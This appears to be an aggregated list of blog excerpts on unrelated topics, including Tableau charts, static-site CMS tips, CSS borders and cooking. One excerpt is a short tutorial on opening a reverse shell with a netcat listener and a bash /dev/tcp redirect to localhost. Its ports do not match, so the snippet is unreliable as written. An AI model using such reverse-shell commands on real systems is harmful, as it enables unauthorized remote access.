In keeping with the “our trout waters are too hot to fish safely” theme, check out some stillwater flies to use.| Trout Unlimited
Scatterplots with tons of overlapping marks are hard to understand. Try hexbins instead! In this tutorial, you’ll learn, step-by-...| www.vizwiz.com
Here is how to get reverse remote shell. I say reverse because the remote system is connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it: nc -l 12345 This will start netcat which will listen on port 12345. Then, in the second terminal, run the following command: /bin/bash -c bash -i >& /dev/tcp/127.0.0.1/8080 0| Everything about nothing
I have a directory full of different files obtained from the Internet and it turned out that some of them contain UTF-8 characters because of which indexing didn't work. So, I had to find all files that contain such characters. The solution I found was the following one: LC_ALL=C find . -name '*[! -~]*' This command will print all filenames with embedded unicode characters represented as| Everything about nothing
While writing a project for Wilcox Tech that we hope to open source soon, I had reason to test the content (or, in some cases, presence) of tags in a Rails app. I came across a good s…| The Cat Fox Life
Adam Engst explains how to troubleshoot when macOS text replacements mysteriously stop working in specific apps and shares a simple solution that’s often overlooked.| TidBITS
Tired of clunky calendar heat maps in Tableau? You’re not alone. Traditional methods (discrete & continuous headers) just don’t cu...| www.vizwiz.com
Ever added a reference line to your Tableau visualization, only to see it appear in the grand total row , even when it doesn’t mak...| www.vizwiz.com
How many times have you seen a chart with so many colors that you can't see one from the others? | VizWiz
As websites and blogs continue to grow, so can the amount of user-uploaded content like images and videos — especially when your site has multiple team members and writers. Over time, it can be tricky to figure out what’s actually used and what’s just collecting dust. We recently helped a customer clean up 5 gigabytes(!!) of unused assets, and you might be surprised how much digital clutter is lurking on your site too. Let’s dive in and see how much data you can free from your Jekyll ...| Siteleaf
A solution! For many months I have been trying to find a decent solution to rounded gradient borders that allow a semi-transparent or blurred main background. Finally, I came across this: https://forum.freecodecamp.org/t/how-to-make-a-css-border-gradient-with-transparent-background/571903/2 My pen https://codepen.io/benfrain/pen/KKEemKd is a fork of Lasse’s original from that post. I’ve not seen this approach before, and I can take no...| Ben Frain
Here’s what NOT to do for your podcast’s success Do you ever look back to when you were starting out podcasting and kick yourself over things you wish you had done differently? Stuff that you later figured out were making it hard for your podcast take off? Setting up a podcast is a learning process, […]| Spreaker Blog
Hey guys! Welcome to my first Taichi cooking session!| docs.taichi-lang.org
Test the performance of std::pow in comparison to simple multiplications.| Blog blog("Baptiste Wicht");
Test the performance of std::pow in comparison to simple multiplications.| Blog blog("Baptiste Wicht");
Forestry.io, a fellow static site CMS, has announced it will be shutting down on April 21, 2023 (see Forestry.io’s End of Life announcement). While this news is definitely a pain for website owners and developers who support these sites, we welcome those looking for a Forestry.io replacement to migrate their static websites to Siteleaf for free (and we’re here to help!). Siteleaf is a content management system with many of the same features, so we think you’ll feel at home here. Why mig...| Siteleaf
Clicking on links that are broken is a bad experience for users, and it can even affect your SEO. Thankfully, it’s really easy to automate the process of checking the links on your site using html-proofer.| Siteleaf
Does your pressure cooker scorch and burn at the thought of pressure cooking a tomato-based recipe? Are you tired of chipping away last night's dinner from the base of your pressure cooker? Think you can't pressure cook a recipe that is boiled, ...| www.hippressurecooking.com